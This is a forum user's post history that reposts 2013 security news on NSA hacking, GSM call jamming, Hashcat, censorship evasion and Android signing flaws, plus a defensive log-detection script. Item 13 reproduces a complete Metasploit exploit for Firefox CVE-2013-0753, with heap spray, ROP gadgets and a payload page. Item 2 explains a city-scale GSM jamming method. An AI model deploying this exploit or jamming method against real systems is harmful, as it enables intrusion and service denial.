Nytro

Everything posted by Nytro

  1. The NSA has its own team of elite hackers

By Andrea Peterson, Published: August 29 at 4:51 pm

NSA headquarters at Fort Meade, MD where TAO’s main team reportedly works (Wikipedia)

Our Post colleagues have had a busy day. First, they released documents revealing the U.S. intelligence budget from National Security Agency (NSA) leaker Edward Snowden. Then they recounted exactly how the hunt for Osama bin Laden went down. In that second report, Craig Whitlock and Barton Gellman shared a few tidbits about the role of the government’s hacking unit, Tailored Access Operations (TAO) in the hunt, writing that TAO “enabled the NSA to collect intelligence from mobile phones that were used by al-Qaeda operatives and other ‘persons of interest’ in the bin Laden hunt.”

So just what is Tailored Access Operations? According to a profile by Matthew M. Aid for Foreign Policy, it’s a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications. Aid claims TAO is also responsible for developing programs that could destroy or damage foreign computers and networks via cyberattacks if commanded to do so by the president.

So, TAO might have had something to do with the development of Stuxnet and Flame, malware programs thought to have been jointly developed by the U.S. and Israel. The malware initially targeted the Iranian nuclear program, but quickly made its way into the digital wild.

According to Aid, TAO’s primary base is in the NSA headquarters in Fort Meade. There, he says, some 600 members of the unit work rotating shifts 24-7 in an “ultramodern” space at the center of the base called the Remote Operations Center (ROC). The unit bears a striking resemblance to a Chinese hacking group described in a report released by cybersecurity company Mandiant earlier this year. The report indicated that that group, APT1, was likely organized by the Chinese military.

Perhaps not so coincidentally, Aid says multiple confidential sources have told him that TAO has “successfully penetrated Chinese computer and telecommunications systems for almost 15 years,” in the process, “generating some of the best and most reliable intelligence information about what is going on inside the People’s Republic of China.”

But for all the reported secrecy surrounding TAO’s activities, a quick search of networking site LinkedIn shows a number of current and former intelligence community employees talking pretty openly about the exploits. For instance, Brendan Conlon, whose page lists him as a former Deputy Chief of Integrated Cyber Operations for the NSA and former Chief of TAO in Hawaii, says that he led “a large group of joint service NSA civilians and contractors in executing Computer Network Exploitation (CNE) operations against target networks.” Barbara Hunt, who is listed as a former Director of Capabilities at TAO in Fort Meade, similarly claims she was “responsible for end-to-end development and capability delivery to build a versatile computer network exploitation effort.”

Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities. He says the 14 personnel under his management have completed “over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements.” Just imagine how productive the team in Fort Meade, rumored to have about 600 people, must be.

Source: The NSA has its own team of elite hackers
  2. Anatomy of a dropped call - how to jam a city with 11 customised mobile phones

by Paul Ducklin on August 29, 2013

When you think of "signal jamming," you probably imagine some kind of fine steel mesh that blocks out radio transmissions altogether, or a source of electromagnetic noise that interferes enough to make legitimate communication impossible.

But a paper presented by a trio of German researchers at the recent USENIX Security Symposium reveals a much more subtle approach to jamming mobile phone calls. They were able to convert a single mobile phone into a denial of service (DoS) device that could be turned against another subscriber, perhaps wherever they roamed through a whole town or city.

The paper is quite technical, and unavoidably filled with the jargon of mobile telephony, yet the authors have done an excellent job of making it into a comprehensible read that teaches you a number of useful security lessons.

As they point out very clearly, many of the security decisions taken in the early days of the GSM (Global System for Mobile) system were based at least in part on security through obscurity. The consensus back then seemed to be, "Nobody will ever be able to build their own base station, or make their own handset!" So why bother going to the trouble of designing in security to protect against the hardware and firmware of the network itself turning hostile?

All that has changed, with open source implementations available for both base stations and handsets. As a result, security shortcuts that didn't seem to matter much 20 years ago have come back to haunt us.

How your phone receives a call

Mobile phones aren't in a perpetual state of readiness to receive calls or SMSes (text messages) instantaneously. Instead, your phone spends most of its time in a low-power mode, from which it can be signalled to wake up fully to accept a call or message.

(That's why your phone battery may well last for days when you aren't making or receiving calls, but typically only hours when you are.)

Rather casually simplified, and with apologies to the authors of the USENIX paper, this is what happens when a nearby cell tower decides it's time for you to get a call:

  1. The base station sends out a broadcast page containing an identification code for your phone.
  2. Your phone recognises its own identification code.
  3. Your phone wakes up and responds to the base station.
  4. The base station and your phone negotiate a private radio channel for the call.
  5. Your phone authenticates to the base station.
  6. Your phone starts ringing (or an SMS arrives).

How an attacker can "jam" your calls

You can probably spot what computer scientists call a race condition in the sequence above, caused by the fact that authentication happens late in the game. Every device in range can listen in to the broadcast pages inviting your phone to wake up, so a device that's faster than yours can race you to step 5 and win, causing your phone's attempt to authenticate to be rejected.

Of course, the "jamming" phone doesn't know how to authenticate, but that doesn't matter; in fact, it can deliberately fail the authentication, causing the process to bail out at step 5. There is no step 6, so the call is lost - invisibly to you, because you lost the race to reply - and service is denied.

The authors got this attack working with a tweaked open source baseband (mobile phone firmware) that was adapted to ensure that it ran faster than a wide range of commercial handsets, including the Apple iPhone 4s, Samsung Galaxy S2 and Blackberry 9300 Curve.

How an attacker finds your phone

There is no authentication or encryption during the "are you there?" message and the "here I am!" reply, so an attacker doesn't need any cryptographic cleverness to work out which messages are meant for what devices.

There is a slight complication, however: the attacker probably doesn't know your phone's identification code in advance. To be strictly correct: the code is tied to your SIM card, not to the phone hardware itself, since every SIM has a unique code called an IMSI (International Mobile Subscriber Identity) burned into it, rather like the MAC address in a network card.

But GSM phones deliberately minimise the frequency with which unencrypted IMSIs are visible on the network, in order to provide you with some safety and privacy against being tracked too openly. Instead, occasional exchanges involving your true IMSI are used to produce a regularly changing TMSI, where T stands for Temporary. The TMSI is a pseudorandom, temporary identifier that varies as a matter of course as you turn your phone off and on or roam through a network. The network operator maintains a list to keep track of which TMSI relates to what IMSI at any moment, but that database is unlikely to be accessible to an attacker.

The authors used traffic analysis to get round this problem. While sniffing all the TMSIs being broadcast on the network, they call your number 10 to 20 times in quick succession, but deliberately drop each call after a few seconds. The TMSI that suddenly appears 10 to 20 times in quick succession in the sniffer logs, as the network tries to track you down with its broadcast pages, is almost certainly the one they want. Easy, isn't it?

As long as they drop the call after the TMSI has been sent in a broadcast page but before your phone gets past the authentication stage (step 5 above), your phone won't ring and the imposter calls won't show up. That means you won't be aware that anything dodgy is going on. The authors used trial and error to determine a suitable call-drop delay for the network provider they targeted, finding that 3.7 seconds worked well.

How the attacker finds out which cell you are in

Here's the thing: he doesn't need to know more than your general location.

When you receive a call, the mobile network doesn't page for your phone only in one cell of the network - it pages throughout your location area, which is a cluster of base stations in the vicinity. This means that the network doesn't need to keep precise tabs on you all the time, which in turn means that your phone doesn't have to tell the network exactly where it is from moment to moment, thus extending battery life.

So as long as I know you are somewhere, say, in the City of Sydney, I can sit in a coffee shop at the Opera House and sniff for your TMSI wherever you go in town, because the broadcast pages that go out when I make those 10 to 20 bogus calls are duplicated everywhere in the location area.

The authors did some warmapping drives around Berlin, their home turf, and determined that location areas can be very extensive, ranging from 100km2 to 500km2. (For comparison, the City of Sydney, which stretches from the Harbour Bridge south as far as Central Station, is just 25km2.)

How the attacker can amplify the attack

Instead of looking out for your TMSI and blocking your calls, what if the attacker wanted to block every call to knock a large metro area out in one go?

One rigged sniffer phone alone couldn't do it. The authors found that although their tweaked phone baseband could beat many popular mobile phones in the race to authenticate, it still took about one second to "jam" each broadcast page, limiting each phone to about 60 "jammed" pages per minute.

So they built a rig with eleven tweaked phones, thus allowing them to subvert more than 600 broadcast pages per minute. Their measurements suggested this would be enough to knock out the service of at least some of the four major German operators across one location area (100km2 - 500km2) in metro Berlin. Remember that the eleven attack phones don't have to be distributed through the location area, since all broadcast pages are replicated through all cells in the area.

The only problem the authors faced was how to allocate the TMSI broadcasts amongst their eleven tweaked phones. Using a messaging system to hand out each successively sniffed TMSI to the next phone on the list required the use of a serial connection to each phone, which was too slow. In the end, they simply allowed each phone to select TMSIs by a bit pattern, so that phone 1, for example, might handle TMSIs starting with the bytes 0x00 to 0x1F, and so on.

As an amusing side-effect of tuning the partitioning algorithm to ensure that each phone handled about the same quantity of broadcast pages, the authors noticed that the bytes in most TMSIs were far from randomly distributed. Ironically, in this case, the lack of randomness made the partitioning job harder, not easier.

What about interception, not just jamming?

As the authors note, in some mobile networks, they could go further than just cancelling your calls and knocking you off the network. They observed that some networks, presumably for performance reasons, cheat a little on step 5, and don't authenticate every call. In these cases, an attacker who can win the race to the authentication stage (step 5 above) can do more than cancel your call - he can accept it instead (or receive your SMS), from anywhere in your location area, and you won't realise.

Also, some networks still use outdated, broken versions of the A5 encryption algorithm that is part of the GSM standard. On these networks, your calls can be sniffed and decrypted anyway, but in a busy metro area, an attacker is faced with problems of volume: how to home in automatically only on the calls he really wants to intercept, without having to listen to everyone else's chatter too. The authors' "jamming" firmware could be modified to do just that job, used as a call alerting mechanism instead of for a denial of service.

Sniffing the call data for later decryption can't be done from anywhere in the location area, which is a small mercy, so an attacker needs to be in the same cell as you.

What to do about it?

You can probably guess what mitigations the authors proposed, because they are obvious and easy to say; you will also probably wonder if they will ever happen, because they involve change, and potentially disruptive change at that, so they are hard to do.

Defending against the eavesdropping and call hijacking problems is straightforward: perform authentication for every call or SMS, and don't use broken versions of the GSM cipher. The system already supports everything that's needed; all that is required is for it to be turned on and used by every operator.

Defending against the denial of service problem is slightly trickier, as it needs a protocol change: move authentication up the batting order to prevent the race condition. The authors propose a technically simple way to do this, but it means shifting some of the cryptographic operations from the authentication stage (step 5 above) to the "are you there?/here I am!" stages (steps 1 and 2).

Unfortunately, these mitigations don't include steps you can take to help yourself; they need changes from the mobile operators. Will that happen? Or will backward compatibility, the thorn that is making Windows XP so hard to dislodge, get in the way yet again?

Source: Anatomy of a dropped call – how to jam a city with 11 customised mobile phones | Naked Security
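The article describes two call-flow patterns that are visible from the operator's side even though the subscriber never notices them: the burst of 10 to 20 quickly dropped calls used to make a victim's TMSI stand out in the paging traffic, and the paging responses that are immediately followed by a failed authentication when a faster imposter handset wins the race and deliberately bails out at step 5. The Python below is an added example, not code from the Naked Security article or the USENIX paper; it shows how a network-side log review could surface both patterns. The record formats, field names, thresholds and every log line are constructed assumptions, not any operator's real data.

```python
from collections import defaultdict
from datetime import datetime

# Constructed call records (assumed format, not real operator data):
# time, caller, callee, seconds the call rang before it ended, outcome.
# Twelve calls to one number, each dropped by the caller after ~3.7 s, mirror
# the TMSI-locating probe described in the article; the last two are benign.
CALL_LOG = """\
2013-08-29T10:00:00 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:06 +4917000000001 +4917000000099 3.6 CALLER_HANGUP
2013-08-29T10:00:12 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:18 +4917000000001 +4917000000099 3.8 CALLER_HANGUP
2013-08-29T10:00:24 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:30 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:36 +4917000000001 +4917000000099 3.6 CALLER_HANGUP
2013-08-29T10:00:42 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:48 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:00:54 +4917000000001 +4917000000099 3.8 CALLER_HANGUP
2013-08-29T10:01:00 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:01:06 +4917000000001 +4917000000099 3.7 CALLER_HANGUP
2013-08-29T10:05:00 +4917000000002 +4917000000099 25.0 ANSWERED
2013-08-29T10:06:00 +4917000000003 +4917000000099 4.0 CALLER_HANGUP
"""

# Constructed signalling events (assumed format): time, event, TMSI.
# TMSI 0x4a11b2f0 gets a paging response and then an authentication failure
# every time it is paged, the trace left when an imposter handset wins the race
# and bails out at step 5; TMSI 0x7d3c0a01 authenticates normally.
SIGNALLING_LOG = """\
2013-08-29T11:00:00 PAGING 0x4a11b2f0
2013-08-29T11:00:00 PAGE_RESP 0x4a11b2f0
2013-08-29T11:00:01 AUTH_FAIL 0x4a11b2f0
2013-08-29T11:00:30 PAGING 0x4a11b2f0
2013-08-29T11:00:30 PAGE_RESP 0x4a11b2f0
2013-08-29T11:00:31 AUTH_FAIL 0x4a11b2f0
2013-08-29T11:01:00 PAGING 0x4a11b2f0
2013-08-29T11:01:00 PAGE_RESP 0x4a11b2f0
2013-08-29T11:01:01 AUTH_FAIL 0x4a11b2f0
2013-08-29T11:01:30 PAGING 0x4a11b2f0
2013-08-29T11:01:30 PAGE_RESP 0x4a11b2f0
2013-08-29T11:01:31 AUTH_FAIL 0x4a11b2f0
2013-08-29T11:02:00 PAGING 0x4a11b2f0
2013-08-29T11:02:00 PAGE_RESP 0x4a11b2f0
2013-08-29T11:02:01 AUTH_FAIL 0x4a11b2f0
2013-08-29T11:03:00 PAGING 0x7d3c0a01
2013-08-29T11:03:00 PAGE_RESP 0x7d3c0a01
2013-08-29T11:03:01 AUTH_OK 0x7d3c0a01
"""


def _parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S")


def _max_events_in_window(times, window_s):
    """Largest number of timestamps that fall inside any window_s-second span."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_probe_bursts(log, min_calls=10, window_s=120, max_ring_s=5.0):
    """Caller/callee pairs with >= min_calls short, caller-dropped calls in window_s
    seconds: the 10-20 quickly dropped calls used to make a TMSI stand out."""
    short_calls = defaultdict(list)
    for line in log.splitlines():
        stamp, caller, callee, ring_s, outcome = line.split()
        if outcome == "CALLER_HANGUP" and float(ring_s) <= max_ring_s:
            short_calls[(caller, callee)].append(_parse_time(stamp))
    return {pair: n for pair, times in short_calls.items()
            if (n := _max_events_in_window(times, window_s)) >= min_calls}


def find_auth_failure_bursts(log, min_failures=5, window_s=300, max_gap_s=2.0):
    """TMSIs whose paging responses are repeatedly followed (within max_gap_s) by an
    authentication failure: a subscriber losing the race to a handset that cannot authenticate."""
    last_response = {}
    failures = defaultdict(list)
    for line in log.splitlines():
        stamp, event, tmsi = line.split()
        t = _parse_time(stamp)
        if event == "PAGE_RESP":
            last_response[tmsi] = t
        elif event == "AUTH_FAIL" and tmsi in last_response:
            if (t - last_response[tmsi]).total_seconds() <= max_gap_s:
                failures[tmsi].append(t)
    return {tmsi: n for tmsi, times in failures.items()
            if (n := _max_events_in_window(times, window_s)) >= min_failures}


if __name__ == "__main__":
    print("probe bursts:", find_probe_bursts(CALL_LOG))
    print("auth failure bursts:", find_auth_failure_bursts(SIGNALLING_LOG))
```

Both detectors use a sliding window rather than a fixed per-minute bucket, so a burst that straddles a minute boundary is still counted whole. The thresholds are deliberately loose starting points: the article's 3.7-second drop delay sits well under the 5-second ring limit, and a legitimate subscriber with a flaky SIM produces isolated authentication failures, not one after every paging response.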
  3. Apple's new technology will allow government to control your iPhone remotely

Author: Mohit Kumar, The Hacker News

Recently, social media has been buzzing over reports that Apple has invented a new technology that can now switch off the iPhone camera and Wi-Fi when entering a 'sensitive area'. The technology would broadcast a signal to automatically shut down smartphone features, or even the entire phone.

Yes! It's true. In June 2008 Apple filed a patent (U.S. Patent No. 8,254,902) titled “Apparatus and methods for enforcement of policies upon a wireless device” that defines the ability of the U.S. Government to remotely disable certain functions of a device without user consent. All they need to do is decide that a public gathering or venue is deemed sensitive and needs to be protected from externalities.

Is it not a shame that you can't take a photo of the police officer beating a man in the street because your oppressive government remotely disabled your smartphone camera? Civil liberties campaigners fear it could be misused by the authorities to silence 'awkward citizens'.

Apple insists that the affected locations are normally cinemas, theaters and concert grounds, but Apple admits it could also be used in covert police or government operations that may need complete blackout conditions.

"This technology would be a dangerous power to place in the hands of the government," said Kurt Opsahl, a civil liberties lawyer at the Electronic Frontier Foundation (EFF). "The government shutting down iPhone cameras and connectivity in order to prevent photos of political activity or the organization of the event would constitute a prior restraint on the free speech rights of every person affected, whether they're an activist or an observer," he added.

Apple also says that the user can be given a choice to approve changes being sent remotely; however, one cannot rule out the possibility of some changes being applied to the device without user consent.

Source: Apple's new technology will allow government to control your iPhone remotely - The Hacker News
  4. Yes, a couple more things could be made configurable:
1. The interval at which it checks whether there are new posts
2. The timeout for that popup
Good job.
  5. Yes, too bad it's written in Ruby.
  6. Metasploit - The Exploit Learning Tree

Author: Mohan Santokhi

This is a whitepaper called Metasploit - The Exploit Learning Tree. Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and try to decipher how the various classes and modules hang together to produce the various functions.

References
1. /documentation/developers_guide.pdf
2. http://dev.metasploit.com/documents/meterpreter.pdf
3. external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf
4. www.nologin.org/Downloads/Papers/remote-library-injection.pdf
5. www.nologin.org/Downloads/Papers/win32-shellcode.pdf
6. Metasploit Unleashed
7. http://www.securitytube.net/groups?operation=view&groupId=10

Table of Contents
1 Document Control
1.1 Document Block
1.2 Change History
1.3 References
2 Table of Contents
3 Introduction
4 Setup
4.1 Getting started
4.2 Install Missing Gems
4.3 Test the environment
5 Exploit Metamodel
6 Vulnerable Service
7 msfconsole Initialisation Phase
8 Use command
9 Set command
10 Exploit command
10.1 Create Payload Objects
10.2 Generate Encoded Payload
10.3 Start handler
10.4 Exploit The Target
10.5 Establish Session
10.6 Interact With Target
11 Meterpreter
11.1 Meterpreter payloads
11.2 Client components
11.2.1 UI components
11.2.2 Command proxy components
11.3 Meterpreter Protocol
11.3.1 Client side protocol API
11.3.2 Server side protocol API
11.4 Server components
11.5 Server extensions
12 Writing Meterpreter Extensions
12.1 Design commands, requests and responses
12.2 Implement skeleton extension
12.3 Implement command dispatcher class
12.4 Implement command proxy class
13 Railgun
13.1 Meterpreter scripts

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf

Source: Metasploit - The Exploit Learning Tree | Packet Storm
  7. The Future is Here: C++ 11

Published on 28.08.2013. Special Guest Lecture by C++ Inventor Bjarne Stroustrup
  8. Older accounts, like mine, already had 25 GB.
  9. Visual Studio 2013 IDE

Posted: 16 hours ago. By: Robert Green

In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including:

Signing into the IDE to synchronize your settings [00:40]
Notifications center [06:00]
Improvements to overall look and feel [11:30]
Auto brace completion [16:00]
Enhanced scroll bar [18:45]
Improved Navigate To experience [20:00]
Peek Definition [22:00]
CodeLenses [24:50]

Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9
  10. From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS

Posted: 1 day ago. By: Charles

This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy.

Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9
  11. Hashcat Can Now Be Used to Crack 55-Character Passwords

August 28th, 2013, 11:38 GMT · By Eduard Kovacs

The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters.

A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it’s becoming easier for cybercriminals to crack the hashes.

The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be utilized to crack passwords that are longer than 15 characters.

The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was “by far one of the most requested features.”

“We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52,” Jens Steube, the lead Hashcat developer, wrote in the release notes.

Source: Hashcat Can Now Be Used to Crack 55-Character Passwords
  12. Evading Internet Censorship

This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk:

Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters.

Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked.

Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware works and how to effectively defeat it.

Download: http://blanu.net/Dust.pdf

Source: https://www.schneier.com/blog/archives/2013/08/evading_interne.html
  13. Firefox XMLSerializer Use After Free

Authored by regenrecht, juan vazquez | Site metasploit.com

This Metasploit module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This Metasploit module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox XMLSerializer Use After Free',
      'Description'    => %q{
        This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
        an use after free of an Element object, when using the serializeToStream method
        with a specially crafted OutputStream defining its own write function. This module
        has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'regenrecht',   # Vulnerability Discovery, Analysis and PoC
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0753' ],
          [ 'OSVDB', '89021'],
          [ 'BID', '57209'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ],
          [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ],
          [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
          'PrependMigrate' => true
        },
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'Space'       => 30000 # Indeed a sprayed chunk, just a high value where any payload fits
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Firefox 17 / Windows XP SP3',
            {
              'FakeObject'   => 0x0c101008, # Pointer to the Sprayed Memory
              'FakeVFTable'  => 0x0c10100c, # Pointer to the Sprayed Memory
              'RetGadget'    => 0x77c3ee16, # ret from msvcrt
              'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt
              'StackPivot'   => 0x77c15ed5, # xcht eax,esp # ret msvcrt
            }
          ]
        ],
      'DisclosureDate' => 'Jan 08 2013',
      'DefaultTarget'  => 0))
  end

  def stack_pivot
    pivot =  "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18  # get teb
    pivot << "\x83\xC0\x08"              # add eax, byte 8    # get pointer to stacklimit
    pivot << "\x8b\x20"                  # mov esp, [eax]     # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000     # plus a little offset
    return pivot
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_status("Agent: #{agent}")

    if agent !~ /Windows NT 5\.1/
      print_error("Windows XP not found, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless agent =~ /Firefox\/17/
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    # Fake object landed on 0x0c101008 if heap spray is working as expected
    code = [
      target['FakeVFTable'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['PopRetGadget'],
      0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis
    ].pack("V*")
    code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer)
    code << [target['PopRetGadget']].pack("V") # pop # ret
    code << [target['StackPivot']].pack("V") # stackpivot # xchg eax # esp # ret
    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})

    js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
    js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
    js_ptr = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch))

    content = <<-HTML
<html>
<script>
var heap_chunks;

function heapSpray(shellcode, fillsled) {
  var chunk_size, headersize, fillsled_len, code;
  var i, codewithnum;

  chunk_size = 0x40000;
  headersize = 0x10;
  fillsled_len = chunk_size - (headersize + shellcode.length);
  while (fillsled.length <fillsled_len)
    fillsled += fillsled;
  fillsled = fillsled.substring(0, fillsled_len);
  code = shellcode + fillsled;
  heap_chunks = new Array();
  for (i = 0; i<1000; i++) {
    codewithnum = "HERE" + code;
    heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
  }
}

function gen(len, pad) {
  pad = unescape(pad);
  while (pad.length < len/2)
    pad += pad;
  return pad.substring(0, len/2-1);
}

function run() {
  var container = [];
  var myshellcode = unescape("#{js_code}");
  var myfillsled = unescape("#{js_random}");
  heapSpray(myshellcode,myfillsled);
  var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}";
  var small = gen(72, fake);
  var text = 'x';
  while (text.length <= 1024)
    text += text;
  var parent = document.createElement("parent");
  var child = document.createElement("child");
  parent.appendChild(child);
  child.setAttribute("foo", text);
  var s = new XMLSerializer();
  var stream = {
    write: function() {
      parent.removeChild(child);
      child = null;
      for (i = 0; i < 2097152; ++i)
        container.push(small.toLowerCase());
    }
  };
  s.serializeToStream(parent, stream, "UTF-8");
}
</script>
<body onload="run();">
</body>
</html>
    HTML

    print_status("URI #{request.uri} requested...")
    print_status("Sending HTML")
    send_response(cli, content, {'Content-Type'=>'text/html'})
  end

end
```

Source: Firefox XMLSerializer Use After Free | Packet Storm
  14. Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Stevens's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real.

This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata.

Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane, he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension.

Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact.

Source: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Kewl stuff
  15. Kali Linux - Backdooring Windows 8

https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70

Description: In this video you will learn how to exploit Windows 8 using the Metasploit framework and how you can maintain your access on Windows 8 using Kali Linux and Metasploit.

Source: Kali Linux - Backdooring Windows 8
  16. Gps Hacking

Description: GPS Hacking

For more information please visit: Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV

Source: Gps Hacking
  17. Windows Universal Privilege Escalation Exploit

Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo

Skiddie, but maybe useful/necessary.

Source: Windows Universal Privilege Escalation Exploit
  18. Android Master Key Vulnerability—PoC

Rohit T, August 28, 2013

The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It's very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let's look into what the issue is, how hackers can exploit it, and what needs to be done to fix it.

How Does Android Code Signing Work?

Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the MyFirstApp.apk application, which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue.

Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application's developer. Why would you want to sign the piece of code? For two reasons, basically: authenticity and integrity. Before installing any application, I want to make sure that the application isn't tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building an application and signing it with a certificate, you basically have an APK file at the end.

MyFirstApp.apk

MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator.

APK files are nothing but a collection of zip files. So if you rename an .apk extension as .zip, you will be able to see the contents of the file.

As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest value of each file in the archive.

